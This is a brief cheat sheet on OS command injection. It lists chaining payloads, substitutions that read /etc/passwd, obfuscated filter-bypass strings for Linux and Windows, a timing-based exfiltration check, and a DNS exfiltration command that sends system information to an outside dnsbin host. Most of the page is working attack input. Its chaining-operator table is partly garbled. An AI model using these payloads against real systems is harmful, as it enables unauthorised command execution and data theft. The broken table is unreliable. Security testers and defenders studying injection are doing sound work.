Command Injection #
At a Glance #
Command injection is an attack in which the attacker executes arbitrary commands on the host OS via a vulnerable application. Command injection attacks are possible when an application passes unsafe user-supplied data to a system shell. 1
Note: Commands are usually executed with the privileges of the vulnerable application.
Command Chaining #
<input>; ls
<input>& ls
<input>&& ls
<input>| ls
<input>|| ls
Note:
Also try:
- Prepending a flag or parameter.
- Removing spaces (
<input>;ls).
Chaining Operators #
Windows and Unix supported.
| Syntax | Description | |
|---|---|---|
%0A | cmd1 %0A cmd2 | Newline. Executes both. |
; | cmd1 ; cmd2 | Semi-colon operator. Executes both. |
& | cmd1 & cmd2 | Runs command in the background. Executes both. |
| ` | ` | `cmd1 |
&& | cmd1 && cmd2 | AND operator. Executes cmd2 if cmd1 succeds. |
| ` | ` |
I/O Redirection #
> /var/www/html/output.txt
< /etc/passwd
Command Substitution #
Replace a command output with the command itself.2
<input> `cat /etc/passwd`
<input> $(cat /etc/passwd)
Filter Bypassing #
Space filtering 3 #
Linux #
cat</etc/passwd
# bash
${cat,/etc/passwd}
cat${IFS}/etc/passwd
v=$'cat\x20/etc/passwd'&&$v
IFS=,;`cat<<<cat,/etc/passwd`
Windows 4 #
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
Slash (/) filtering
#
echo ${HOME:0:1} # /
cat ${HOME:0:1}etc${HOME:0:1}passwd
echo . | tr '!-0' '"-1' # /
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
Command filtering #
Quotes.
w'h'o'am'i
w"h"o"am"i
Slash.
w\ho\am\i
/\b\i\n/////s\h
At symbol.
who$@ami
Variable expansion.
v=/e00tc/pa00sswd
cat ${v//00/}
Wildcards.
powershell C:\*\*2\n??e*d.*? # notepad
@^p^o^w^e^r^shell c:\*\*32\c*?c.e?e # calc
Time Based Data Exfiltration 5 #
time if [ $(uname -a | cut -c1) == L ]; then sleep 5; fi
DNS Based Data Exfiltration 6 #
dnsbin Example:
host $(uname -a).c2cebb6a3678849a2eee.d.zhack.ca
“Command Injection | OWASP.” OWASP Foundation | Open Source Foundation for Application Security, https://owasp.org/www-community/attacks/Command_Injection. ↩︎
“Command Injection | OWASP.” OWASP Foundation | Open Source Foundation for Application Security, https://owasp.org/www-community/attacks/Command_Injection. ↩︎
https://twitter.com/bugbountynights/status/860102244171227136 ↩︎
Pobereznicenco, Dan. “Exploiting Timed Based RCE – Security Café.” Security Café, 28 Feb. 2017, https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/. ↩︎
ettic-team. “GitHub - Ettic-Team/Dnsbin: The Request.Bin of DNS Request.” GitHub, https://github.com/ettic-team/dnsbin. ↩︎